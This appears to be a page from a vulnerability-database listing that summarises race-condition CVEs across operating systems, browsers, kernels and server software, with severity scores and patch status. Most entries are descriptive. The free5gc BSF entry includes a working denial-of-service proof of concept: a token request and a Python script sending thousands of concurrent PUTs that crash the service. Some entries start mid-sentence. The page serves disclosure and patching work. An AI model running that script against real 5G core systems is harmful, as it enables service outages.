Remote code execution in Sparx Systems Pro Cloud Server (versions 0 through 6.1 build 167) is achievable by authenticated repository users via a race condition in the /data_api/dl_internal_artifact.php endpoint. An attacker who controls both the filename and contents of a downloaded artifact can briefly stage a malicious PHP file in the web root and execute it before cleanup, leading to full server compromise. No public exploit identified at time of analysis, but a detailed technical write-up published by CERT-PL and sploit.tech reduces the barrier to reproduction.

PHP Race Condition RCE
NVD
EPSS 0% CVSS 5.7
MEDIUM This Month

Kernel heap corruption in NetBSD's opencrypto subsystem enables local privilege-adjacent attackers to crash the kernel via a double-free triggered by a race condition in cryptodev_op(). The flaw exists because mutable per-operation state - including tmp_iv, tmp_mac, iovec, and uio - was embedded directly in the shared csession struct rather than isolated per-operation, making it unsafely accessible across concurrent threads on SMP systems. An authenticated local attacker issuing simultaneous CIOCCRYPT ioctl calls on the same session identifier can race the kernel into freeing the same memory region twice, corrupting the kernel heap. No public exploit identified at time of analysis, though a technical writeup is publicly available at nasm.re/posts/uaf_netbsd_crypto/.

Race Condition Information Disclosure
NVD GitHub
EPSS 0% CVSS 1.3
LOW POC Monitor

Race condition in EMQX MQTT broker versions up to 6.2.0 allows authenticated remote attackers to cause limited availability impact through malformed QoS 2 PUBLISH packet handling in persistent sessions. The vulnerability exploits timing windows in the emqx_persistent_session_ds.erl module, though successful exploitation is marked as difficult with high attack complexity. A proof-of-concept exploit is publicly available on GitHub (Pathfind-tama/Report_EMQX_MQTT), demonstrating QoS 2 message duplication attacks. CVSS 3.1, exploitability requires low-privilege authentication and precise timing, limiting real-world risk despite public POC.

Race Condition Information Disclosure Emqx
NVD VulDB GitHub
EPSS 0% CVSS 8.4
HIGH This Week

Race condition in HarmonyOS web component enables local privilege escalation to full system compromise without authentication. The TOCTOU flaw (CWE-362) allows local attackers to achieve high confidentiality, integrity, and availability impact through unauthorized permission escalation. Huawei has released patches via May 2026 security bulletins for both mobile and laptop devices. EPSS data not yet available for this 2026 CVE; no confirmed active exploitation or public POC identified at time of analysis.

Race Condition Information Disclosure
NVD
EPSS 0% CVSS 8.3
HIGH PATCH This Week

Race in Payments in Google Chrome prior to 148.0.7778.168 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)

Race Condition Google Information Disclosure +3
NVD VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Grafana Live's concurrent request handling exposes authenticated Viewer-role users as a denial-of-service vector: sending concurrent requests triggers a fatal map access error that crashes the entire Grafana server, requiring a manual restart to restore service. All Grafana OSS releases from 8.2.0 through 13.0.1 are affected across multiple maintained branches, making the exposure surface exceptionally broad. No public exploit identified at time of analysis and EPSS sits at 0.04% (12th percentile), but the low privilege bar - any Viewer account - and reliable triggering (AC:L) mean insider threats and compromised low-privilege accounts represent a realistic DoS risk for organizations without guest/anonymous access controls.

Denial Of Service Grafana Race Condition +1
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.

Microsoft Race Condition Information Disclosure
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH Exploit Unlikely This Week

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Native WiFi Miniport Driver allows an unauthorized attacker to execute code over an adjacent network.

Authentication Bypass Microsoft Race Condition
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH Exploit Unlikely This Week

Local privilege escalation in Windows TCP/IP stack affects Windows 10 (1607-22H2), Windows 11 (22H3-26H1), and Windows Server 2012 through a race condition vulnerability. Low-complexity exploitation requires only low-privilege authenticated access with no user interaction (CVSS 7.8, AV:L/AC:L/PR:L/UI:N). Vendor-released patch available from Microsoft Security Response Center. No public exploit code or active exploitation confirmed at time of analysis, though the low attack complexity and local vector suggest feasibility for post-compromise privilege escalation in enterprise environments.

Microsoft Race Condition Information Disclosure
NVD VulDB
EPSS 0% CVSS 7.0
HIGH PATCH Exploit Unlikely This Week

Race condition in Windows Ancillary Function Driver for WinSock (AFD.sys) enables local privilege escalation for low-privileged authenticated users across Windows 10 (1607-22H2), Windows 11 (22H3-26H1), and Windows Server 2016. Microsoft confirmed the vulnerability and released patches via their March 2026 security updates. The flaw requires high attack complexity (CVSS AC:H), suggesting exploitation depends on winning a narrow timing window in concurrent socket operations. EPSS data unavailable, no CISA KEV listing at time of analysis, but Microsoft's rapid patch indicates credible exploit risk.

Microsoft Race Condition Information Disclosure
NVD VulDB
EPSS 0% CVSS 7.0
HIGH PATCH Exploit Unlikely This Week

Local privilege escalation in Windows Print Spooler Components affects Windows 10, Windows 11, and Windows Server 2012 through race condition exploitation. Authenticated low-privileged attackers can elevate to SYSTEM privileges via concurrent resource access attacks, though attack complexity is rated high (AC:H). Vendor-released patch available from Microsoft Security Response Center. No active exploitation confirmed in CISA KEV at time of analysis, but Print Spooler remains a historically attractive target with established attack patterns (PrintNightmare, SpoolFool precedents).

Microsoft Race Condition Information Disclosure
NVD VulDB
EPSS 0% CVSS 7.0
HIGH PATCH This Week

Race condition in Windows Win32K graphics subsystem enables authenticated local users with low privileges to escalate to SYSTEM-level access on Windows 10 (1607 through 22H2), Windows 11 (all versions through 26H1), and Windows Server 2012. Microsoft has released patches through their monthly security update cycle (MSRC advisory CVE-2026-34331). EPSS data unavailable; no CISA KEV listing or public POC identified at time of analysis. The CVSS 7.0 score reflects high attack complexity (AC:H) requiring precise timing to exploit the synchronization flaw, reducing practical exploit reliability compared to simpler privilege escalation vectors.

Microsoft Race Condition Information Disclosure
NVD VulDB
EPSS 0% CVSS 7.0
HIGH PATCH This Week

Local privilege escalation in Windows Win32K GRFX component allows authenticated low-privilege users to gain SYSTEM-level access through race condition exploitation. Affects Windows 10 (1809, 21H2, 22H2), Windows 11 (22H3 through 26H1), and Windows Server 2019 including Server Core installations. Microsoft has released patches via their May 2026 security updates. Attack complexity is high (AC:H), requiring precise timing to win the race condition, limiting widespread automated exploitation despite the severe impact on confidentiality, integrity, and availability.

Microsoft Race Condition Information Disclosure
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Complete process crash in Dalfox REST server v2.12.0 and earlier allows remote unauthenticated attackers to terminate the entire scan engine via a single HTTP request. The flaw stems from a closed-channel write panic in pkg/scanning/parameterAnalysis.go where two sequential worker stages share a single results channel, causing a Go runtime panic when the second stage attempts to write to the already-closed channel. Default deployments run without authentication (no --api-key), making the vulnerability remotely exploitable. CVSS 7.5 (High). Patched in v2.13.0 per GitHub advisory GHSA-2g4x-fq3j-cgq4. No CISA KEV listing or public exploit code identified at time of analysis.

XSS Docker Race Condition
NVD GitHub
EPSS 0% CVSS 7.8
HIGH This Week

Race condition in Ivanti Secure Access Client enables local privilege escalation to SYSTEM from low-privileged accounts. Affects versions before 22.8R6. An authenticated local user can exploit timing vulnerabilities in the client software to gain complete system control. While limited to local attack vector (requires existing access to the target system), the low attack complexity (AC:L) and lack of user interaction requirement (UI:N) make this exploitable once local access is achieved. No public exploit code identified at time of analysis, and EPSS risk scoring not yet available for this 2026 CVE.

Privilege Escalation Race Condition Ivanti
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

A race condition in Apple operating systems allows authenticated local attackers to access sensitive user data with high complexity exploitation. The vulnerability affects iOS 18.7.9 and earlier, iPadOS 18.7.9 and earlier, iOS 26.5 and earlier, iPadOS 26.5 and earlier, macOS Sequoia 15.7.7 and earlier, macOS Sonoma 14.8.7 and earlier, macOS Tahoe 26.5 and earlier, and visionOS 26.5 and earlier. Vendor-released patches are available, and exploitation requires local access with user-level privileges and high technical complexity. The EPSS score of 0.02% and absence from active exploitation databases indicate low real-world exploitation risk despite the high confidentiality impact.

Apple Race Condition Information Disclosure
NVD
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Memory corruption in Apple operating systems due to a race condition in locking mechanisms allows local authenticated attackers to cause unexpected app termination or potential denial of service. The vulnerability affects iOS 18.7.8 and earlier, iPadOS 18.7.8 and earlier, macOS Sequoia 15.7.6 and earlier, macOS Sonoma 14.8.6 and earlier, macOS Tahoe 26.4 and earlier, tvOS 26.4 and earlier, visionOS 26.4 and earlier, and watchOS 26.4 and earlier. Vendor-released patches are available across all affected platforms, with no public exploit identified at time of analysis.

Apple Race Condition Buffer Overflow
NVD
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Malicious applications on macOS Sequoia, Sonoma, and Tahoe can bypass user consent prompts to access the Contacts database through a race condition in symbolic link handling. Apple has patched this privacy control bypass in macOS Sequoia 15.7.7, Sonoma 14.8.7, and Tahoe 26.5. Despite a network-based CVSS vector scoring 7.5 (High), the actual attack requires local application execution, indicating likely miscategorization in the metric. EPSS exploitation probability is very low (0.02%, 4th percentile) with no active exploitation or public POC identified at time of analysis.

Apple Race Condition Information Disclosure
NVD
EPSS 0% CVSS 7.5
HIGH PATCH This Week

A race condition in Apple operating systems allows unauthenticated remote attackers to cause system-wide denial of service through unexpected system termination. The vulnerability affects iOS/iPadOS, macOS (Sequoia, Sonoma, Tahoe), tvOS, and watchOS across multiple version branches. Apple has released patches for all affected platforms. The CVSS 7.5 score reflects high availability impact with network attack vector and low complexity, though EPSS probability remains very low (0.02%, 7th percentile), suggesting limited real-world exploitation likelihood. No active exploitation confirmed (not listed in CISA KEV), and no public proof-of-concept identified at time of analysis.

Apple Race Condition Information Disclosure
NVD
EPSS 0% CVSS 5.5
MEDIUM PATCH This Month

Race condition in Apple operating systems allows local apps to access sensitive user data without authorization. Affects iOS and iPadOS versions below 26.5, macOS Sequoia 15.7.7, Sonoma 14.8.7, Tahoe 26.5, tvOS, visionOS, and watchOS versions below 26.5. Requires local app execution and user interaction. CVSS 5.5 reflects high confidentiality impact but low exploitation likelihood (EPSS 0.02%, 7th percentile).

Apple Race Condition Information Disclosure
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

A race condition was addressed with additional validation. This issue is fixed in macOS Tahoe 26.4. An app may be able to access sensitive user data.

Apple Race Condition Information Disclosure
NVD
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

{subId}` handler has an unsynchronized write on the global `Subscriptions` map. The handler first reads the map under `RLock()` via `BSFContext.GetSubscription(subId)`, but if the subscription does not exist, `ReplaceIndividualSubcription()` writes back to the same map directly without taking the mutex (`bsfContext.BsfSelf.Subscriptions[subId] = subscription`). Under concurrent authenticated PUT load, one goroutine can read while another writes the map, which causes the Go runtime to abort the process with `fatal error: concurrent map read and map write` (Go runtime panics that come from concurrent map access bypass `recover()` and terminate the process). The BSF container exits with code `2` -- the entire BSF SBI surface goes down until restart. This endpoint requires a valid `nbsf-management` OAuth2 access token (PR:L, NOT PR:N), so this is scored as an authenticated process-kill DoS. Validated against the BSF container in the official Docker compose lab. - Source repo tag: `v4.2.1` - Running Docker image: `free5gc/bsf:v4.2.1` - Docker validation date: 2026-03-22 - BSF endpoint: `http://10.100.200.11:8000` Read side (locked): ```go func (c *BSFContext) GetSubscription(subId string) (*BsfSubscription, bool) { c.mutex.RLock() defer c.mutex.RUnlock() sub, exists := c.Subscriptions[subId] return sub, exists } ``` Unsafe write side in the create-if-absent branch of `ReplaceIndividualSubcription` (no `Lock()`): ```go subscription.SubId = subId bsfContext.BsfSelf.Subscriptions[subId] = subscription ``` Under concurrent traffic, the Go runtime detects the unsynchronized read/write on `c.Subscriptions` and aborts the process. Go's `concurrent map read and map write` fatal is NOT a normal panic -- it is unrecoverable, Gin's recovery middleware does not catch it, and the BSF process terminates. Code evidence (paths in `free5gc/bsf`): - Read side (locked): - `NFs/bsf/internal/sbi/processor/subscriptions.go:81` - `NFs/bsf/internal/context/context.go:726` - `NFs/bsf/internal/context/context.go:730` - Unsafe write side (the create-if-absent branch in PUT, no lock): - `NFs/bsf/internal/sbi/processor/subscriptions.go:111` - `NFs/bsf/internal/sbi/processor/subscriptions.go:114` The normal locked helpers (`CreateSubscription()`, `GetSubscription()`, `UpdateSubscription()`, `DeleteSubscription()`) DO take the mutex correctly. The bug is specific to the inline write inside the PUT create-if-absent branch. Reproduced end-to-end against the running BSF at `http://10.100.200.11:8000`. 1. Obtain a valid `nbsf-management` token from NRF: ``` curl -sS -X POST 'http://10.100.200.3:8000/oauth2/token' \ -H 'Content-Type: application/x-www-form-urlencoded' \ --data 'grant_type=client_credentials&nfType=NEF&nfInstanceId=eb9990de-4cd3-41b0-b5d9-c2102b088c57&targetNfType=BSF&scope=nbsf-management' ``` 2. Send concurrent PUT requests against fresh `subId` values (the validated lab uses 64 worker threads x 50 fresh subIds = 3200 concurrent PUTs): ```python import json, threading, urllib.request TOKEN = "<valid_nbsf_management_jwt>" BASE = "http://10.100.200.11:8000/nbsf-management/v1" PAYLOAD = json.dumps({ "events": ["PCF_BINDING_CREATION"], "notifUri": "http://127.0.0.1/cb", "notifCorreId": "1", "supi": "imsi-208930000000003", }).encode() def send_put(i, n): url = f"{BASE}/subscriptions/race-mix-{i}-{n}" req = urllib.request.Request(url, data=PAYLOAD, method="PUT") req.add_header("Authorization", f"Bearer {TOKEN}") req.add_header("Content-Type", "application/json") urllib.request.urlopen(req, timeout=2).read() threads = [] for i in range(64): for n in range(50): threads.append(threading.Thread(target=send_put, args=(i, n))) for t in threads: t.start() for t in threads: t.join() ``` 3. BSF container logs (`docker logs bsf`) show the Go runtime fatal that terminated the process: ``` [INFO][BSF][Proc] Handle ReplaceIndividualSubcription fatal error: concurrent map read and map write github.com/free5gc/bsf/internal/sbi/processor.ReplaceIndividualSubcription(0xc000514300) github.com/free5gc/bsf/internal/sbi/processor/subscriptions.go:81 +0x15f ``` 4. Container state confirms exit code 2: ``` exited|2|0 ``` Unsynchronized concurrent access (CWE-362) to a shared map (`BsfSelf.Subscriptions`), combined with missing synchronization on the create-if-absent branch (CWE-820). Go's runtime detects concurrent map read/write and terminates the process via a non-recoverable fatal error -- Gin's `recover()` middleware does NOT catch this class of fatal, unlike ordinary nil-deref panics. The whole BSF process exits, dropping BSF's `nbsf-management` SBI surface (PCF binding lookups for SMF, AF -> PCF binding discovery, etc.) until restart. Any party that holds (or can obtain) a valid `nbsf-management` token can: - Drive the create-if-absent code path at high concurrency by PUTting a stream of fresh `subId` values, deterministically tripping the runtime fatal and killing the BSF process. - Repeat the trigger after every restart to sustain the outage. No Confidentiality impact (the crash returns no attacker-readable data). No persistent Integrity impact (BSF subscription state is in-memory and is lost when the process dies). The whole impact concentrates in Availability: complete loss of BSF service via concurrent attacker traffic on a single endpoint. Affected: free5gc v4.2.1. Upstream issue: https://github.com/free5gc/free5gc/issues/926 Upstream fix: https://github.com/free5gc/bsf/pull/7

Denial Of Service Python Docker +1
NVD GitHub
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Race condition in the Linux kernel nvme-pci driver's nvme_poll_irqdisable() function causes an unbalanced IRQ enable/disable pair that crashes the kernel with a warning. Affected kernels from 5.7 through multiple stable branches are vulnerable when running PCIe NVMe storage with MSI-X interrupts: a concurrent NVMe device reset can change the IRQ vector between the disable_irq() and enable_irq() calls, making the kernel operate on different IRQ numbers. No public exploit identified at time of analysis and EPSS of 0.02% confirm this is a reliability/stability concern patched in kernel stable releases 6.1.167, 6.6.130, 6.12.78, 6.18.19, 6.19.9, and 7.0.

Linux Denial Of Service Race Condition +2
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Race condition in the Linux kernel cgroup subsystem's task iterator exposes local low-privileged users to a denial-of-service condition when task migration and cgroup iteration execute concurrently. The cgroup infrastructure fails to advance active css_task_iters before a task is unlinked from cset->tasks during migration, allowing iterators to reference the wrong linked list and silently skip tasks - or in worst-case scenarios, cause css_task_iter_advance() to crash or loop infinitely on the destination css_set. No public exploit identified at time of analysis; EPSS of 0.02% at the 7th percentile reflects extremely low observed exploitation probability and aligns with the narrow race window required.

Denial Of Service Google Linux +3
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Race condition in the Linux kernel's yurex USB driver probe function allows a local low-privileged attacker to cause a denial of service by triggering a timing window between URB submission and bbu member initialization. Affected are all kernel versions from the initial commit through the stable branch fix points (patched in 5.10.253, 5.15.203, 6.1.167, 6.6.130, 6.12.78, 6.18.19, 6.19.9, and 7.0). No public exploit exists and the issue is not listed in CISA KEV; EPSS of 0.02% (7th percentile) reflects negligible widespread exploitation probability.

Information Disclosure Linux Race Condition +2
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Kernel panic triggered by a race condition in the UFS Host Controller Driver (ufshcd) during system suspend affects Linux systems using Universal Flash Storage hardware where UFSHCD_CAP_CLK_GATING is not supported. The flaw allows a local low-privileged user - or automated power management - to crash the kernel by triggering a suspend sequence while ufshcd_rtc_work() is concurrently executing, producing an ARM64 asynchronous SError interrupt that halts the system. No public exploit code exists and no active exploitation has been identified; with an EPSS of 0.02% this is a low-probability but confirmed-availability-destroying defect patched across multiple stable kernel branches.

Information Disclosure Linux Race Condition +2
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Race condition in Linux kernel I3C HCI DMA dequeue handler allows local authenticated attackers with low privileges to trigger memory corruption leading to privilege escalation, denial of service, or information disclosure. The vulnerability affects kernel versions from 5.11 onwards where the mipi-i3c-hci driver is enabled. EPSS probability is low (0.02%, 4th percentile) and no active exploitation or public POC is identified at time of analysis. Vendor patches available for stable kernel branches 6.18.19, 6.19.9, and 7.0.

Information Disclosure Linux Race Condition
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Race condition in the Linux kernel's USB RNDIS gadget function driver (f_rndis) allows a local low-privileged attacker to crash the kernel by concurrently manipulating class/subclass/protocol configfs attributes without mutex protection. Identified during code inspection - not observed in active exploitation - this vulnerability affects multiple stable kernel branches from 4.14 through 7.0-rc3, with patches released across all maintained stable series. With an EPSS of 0.02% (7th percentile), no public exploit, and no CISA KEV listing, real-world risk is low but meaningful on embedded or IoT devices using Linux as a USB RNDIS peripheral.

Information Disclosure Race Condition Linux +2
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Pre-NVD disclosure via oss-security: oss-security mailing list - 2026/04/28. dvisory 484 v2 (CVE-2026-23557) - Xenstored DoS via XS_RESET_WATCHES command (Xen.org security team <security@....org>) Xen Security Advisory 485 v2 (CVE-2026-31786) - Linux kernel out of bounds read via Xen-related sysfs file (Xen.org security team <security@....org>) Xen Security Advisory 486 v2 (CVE-2026-23558) - grant table v2 race in status page mapping (Xen.org security team <security@....org>) Xen Security Advisory 487 v2 (CVE-2026-31787) - Linux kernel double free in Xen privcmd driver (Xen.org security team <security@....org>) Coordinated Disclosure in the LLM Age (Jeremy Stanley <fungi@...goth.org

Buffer Overflow Linux Race Condition +1
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Unauthenticated remote attackers crash Gotenberg 8.x (≤ 8.31.0) by triggering a race condition between webhook goroutine context reuse and Echo framework connection pooling. When webhook middleware spawns an async goroutine holding an `echo.Context` reference, the synchronous handler returns immediately, recycling the context to Echo's `sync.Pool`. Concurrent requests reset the pooled context, causing unchecked type assertions in the still-running webhook goroutine to panic outside any `recover()` scope, terminating the process with exit code 2. Twenty-four webhook requests plus sixty concurrent GET requests demonstrate reliable two-second crash windows. No patch was available at initial disclosure; upstream commit fixes the panic in version 8.32.0. CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) reflects trivial unauthenticated network exploitation producing complete service disruption.

Kubernetes Denial Of Service Python +3
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Information disclosure in Google Chrome prior to 148.0.7778.96 allows remote attackers who have compromised the renderer process to extract potentially sensitive data from process memory through a race condition triggered by a crafted HTML page. The vulnerability requires renderer process compromise and user interaction but results in high confidentiality impact with no integrity or availability consequences. Chromium security team rates this as Medium severity; no active exploitation has been publicly confirmed.

Race Condition Google Information Disclosure +3
NVD VulDB
EPSS 0% CVSS 3.1
LOW PATCH Monitor

Google Chrome prior to version 148.0.7778.96 contains a race condition in shared storage that allows a remote attacker with a compromised renderer process to leak cross-origin data through a crafted HTML page. The vulnerability requires user interaction and renderer compromise but can disclose sensitive information across origin boundaries, classified as medium severity by Chromium security team.

Race Condition Google Information Disclosure +1
NVD VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Local privilege escalation in Google Chrome Chromoting (remote desktop component) allows authenticated Windows users to gain elevated system privileges through a race condition exploit triggered by a malicious file. Fixed in Chrome 148.0.7778.96. The vulnerability requires user interaction and high attack complexity (AC:H), limiting automated exploitation despite the 7.5 CVSS score. No public exploit identified at time of analysis, and not listed in CISA KEV.

Privilege Escalation Microsoft Race Condition +4
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: core: Flush exception handling work when RPM level is zero Ensure that the exception event handling work is explicitly flushed during suspend when the runtime power management level is set to UFS_PM_LVL_0. When the RPM level is zero, the device power mode and link state both remain active. Previously, the UFS core driver bypassed flushing exception event handling jobs in this configuration. This created a race condition where the driver could attempt to access the host controller to handle an exception after the system had already entered a deep power-down state, resulting in a system crash. Explicitly flush this work and disable auto BKOPs before the suspend callback proceeds. This guarantees that pending exception tasks complete and prevents illegal hardware access during the power-down sequence.

Denial Of Service Race Condition Linux +2
NVD VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Race condition in Linux kernel TCP/IPv6 stack allows remote unauthenticated attackers to trigger use-after-free conditions during IPv6-mapped IPv4 socket creation, potentially achieving arbitrary code execution or denial of service. The flaw occurs in tcp_v6_syn_recv_sock() where child socket visibility in the TCP hash table races with incomplete IPv6 structure initialization, causing other CPUs to access invalid memory via newinet->pinet6 pointing to listener data. Vendor patches available for kernel versions 6.18.16, 6.19.6, and 7.0. EPSS score of 0.02% (4th percentile) indicates low observed exploitation probability despite critical CVSS 9.8 rating, suggesting this requires specific IPv6-mapped IPv4 configuration and precise timing to exploit.

Information Disclosure Linux Race Condition
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Use-after-free in the Linux kernel's md/bitmap subsystem triggers a General Protection Fault (GPF) in write_page() during MD array resize operations, resulting in a kernel crash and denial of service. Affected are systems using Software RAID (md) with bitmap support across a wide range of stable kernel series from 3.5 through 7.0, with patches backported to 5.10.252, 5.15.202, 6.1.165, 6.6.128, 6.12.75, 6.18.16, and 6.19.6. No public exploit code exists and the EPSS score of 0.02% (7th percentile) indicates very low exploitation probability; however, Red Hat has issued a formal advisory (RHSA-2026:19568), confirming vendor acknowledgment.

Information Disclosure Race Condition Linux
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: io_uring/zcrx: fix user_ref race between scrub and refill paths The io_zcrx_put_niov_uref() function uses a non-atomic check-then-decrement pattern (atomic_read followed by separate atomic_dec) to manipulate user_refs. This is serialized against other callers by rq_lock, but io_zcrx_scrub() modifies the same counter with atomic_xchg() WITHOUT holding rq_lock. On SMP systems, the following race exists: CPU0 (refill, holds rq_lock) CPU1 (scrub, no rq_lock) put_niov_uref: atomic_read(uref) - 1 // window opens atomic_xchg(uref, 0) - 1 return_niov_freelist(niov) [PUSH #1] // window closes atomic_dec(uref) - wraps to -1 returns true return_niov(niov) return_niov_freelist(niov) [PUSH #2: DOUBLE-FREE] The same niov is pushed to the freelist twice, causing free_count to exceed nr_iovs. Subsequent freelist pushes then perform an out-of-bounds write (a u32 value) past the kvmalloc'd freelist array into the adjacent slab object. Fix this by replacing the non-atomic read-then-dec in io_zcrx_put_niov_uref() with an atomic_try_cmpxchg loop that atomically tests and decrements user_refs. This makes the operation safe against concurrent atomic_xchg from scrub without requiring scrub to acquire rq_lock. [pavel: removed a warning and a comment]

Race Condition Buffer Overflow Linux +2
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

Use-after-free vulnerability in the Linux kernel rpmsg subsystem allows local attackers with low privileges to cause denial of service by exploiting a race condition between driver_override_show() and driver_override_store() functions. The show function reads the driver_override string without holding the device_lock while the store function modifies and frees it under lock, creating a window for memory corruption. The vulnerability requires local access and non-default timing conditions (AC:H), limiting real-world exploitation probability to 0.02% per EPSS scoring.

Race Condition Information Disclosure Linux +2
NVD VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Use-after-free in Linux kernel netfilter ctnetlink allows local authenticated attackers with low privileges to achieve code execution, privilege escalation, or denial of service. The vulnerability stems from insufficient protection when accessing master conntrack objects through expectations - holding a reference on the expectation alone does not prevent the master conntrack from being freed, creating a window where exp->master points to freed memory. Patched in stable kernel versions 6.18.24, 6.19.14, and mainline 7.0. EPSS score of 0.02% (4th percentile) indicates low probability of widespread exploitation, and no public exploit or CISA KEV listing exists at time of analysis, suggesting this remains a lower-priority item despite the 7.8 CVSS score.

Information Disclosure Linux Race Condition
NVD VulDB
Prev Page 2 of 21 Next

Quick Facts

Typical Severity
MEDIUM
Category
web
Total CVEs
1813

Related CWEs

MITRE ATT&CK

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy